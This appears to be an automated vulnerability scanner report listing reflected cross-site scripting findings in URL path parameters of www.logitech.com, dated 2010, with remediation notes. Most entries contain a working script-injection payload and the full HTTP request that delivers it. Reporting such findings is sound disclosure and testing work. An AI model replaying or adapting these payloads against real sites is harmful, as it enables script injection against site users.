HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63a13"%3b30e6eedba12 was submitted in the REST URL parameter 1. This input was echoed as 63a13";30e6eedba12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us63a13"%3b30e6eedba12/478/3363 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e74d"><script>alert(1)</script>7e58a84339a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4789e74d"><script>alert(1)</script>7e58a84339a/3363 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aecb8</script><script>alert(1)</script>5916b664c6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478aecb8</script><script>alert(1)</script>5916b664c6f/3363 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467ed</script><script>alert(1)</script>d9963cb2eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3363467ed</script><script>alert(1)</script>d9963cb2eff HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1401c"><script>alert(1)</script>d8af271c1ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/33631401c"><script>alert(1)</script>d8af271c1ae HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25fc9</script><script>alert(1)</script>a86695e3ef1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /25fc9</script><script>alert(1)</script>a86695e3ef1/478/3364 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93868"><script>alert(1)</script>809955e9ce1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us93868"><script>alert(1)</script>809955e9ce1/478/3364 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e9df"%3bef048ea4cdb was submitted in the REST URL parameter 1. This input was echoed as 1e9df";ef048ea4cdb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us1e9df"%3bef048ea4cdb/478/3364 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2102f</script><script>alert(1)</script>98517b169f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4782102f</script><script>alert(1)</script>98517b169f5/3364 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbdc"><script>alert(1)</script>358b0883c73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4785dbdc"><script>alert(1)</script>358b0883c73/3364 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab402"><script>alert(1)</script>0430760eb51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3364ab402"><script>alert(1)</script>0430760eb51 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee4af</script><script>alert(1)</script>1052ba0cb97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3364ee4af</script><script>alert(1)</script>1052ba0cb97 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8065f"><script>alert(1)</script>c317a03f874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us8065f"><script>alert(1)</script>c317a03f874/478/3366 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c42"%3b68bd566cd39 was submitted in the REST URL parameter 1. This input was echoed as 74c42";68bd566cd39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us74c42"%3b68bd566cd39/478/3366 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 933e8</script><script>alert(1)</script>459d32f75d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /933e8</script><script>alert(1)</script>459d32f75d3/478/3366 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b14d6</script><script>alert(1)</script>3364c5d5f67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478b14d6</script><script>alert(1)</script>3364c5d5f67/3366 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 676ba"><script>alert(1)</script>c7ccf064b73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478676ba"><script>alert(1)</script>c7ccf064b73/3366 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132f0"><script>alert(1)</script>079893b985d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3366132f0"><script>alert(1)</script>079893b985d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 966a5</script><script>alert(1)</script>cb58cf85e75 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3366966a5</script><script>alert(1)</script>cb58cf85e75 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da3d0</script><script>alert(1)</script>4300ebc67d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /da3d0</script><script>alert(1)</script>4300ebc67d9/478/3368 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 675e4"%3bfc065eb2856 was submitted in the REST URL parameter 1. This input was echoed as 675e4";fc065eb2856 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us675e4"%3bfc065eb2856/478/3368 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f28"><script>alert(1)</script>e9c3b0dce01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usb6f28"><script>alert(1)</script>e9c3b0dce01/478/3368 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee381"><script>alert(1)</script>4a93b033f6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478ee381"><script>alert(1)</script>4a93b033f6a/3368 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8feba</script><script>alert(1)</script>e94af1b5cf9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4788feba</script><script>alert(1)</script>e94af1b5cf9/3368 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a72e</script><script>alert(1)</script>e89e3f3560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/33682a72e</script><script>alert(1)</script>e89e3f3560 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac75"><script>alert(1)</script>f14159a1af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3368aac75"><script>alert(1)</script>f14159a1af HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d913"%3b582c0eec664 was submitted in the REST URL parameter 1. This input was echoed as 2d913";582c0eec664 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us2d913"%3b582c0eec664/478/3369 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3922</script><script>alert(1)</script>f75443d4dda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c3922</script><script>alert(1)</script>f75443d4dda/478/3369 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
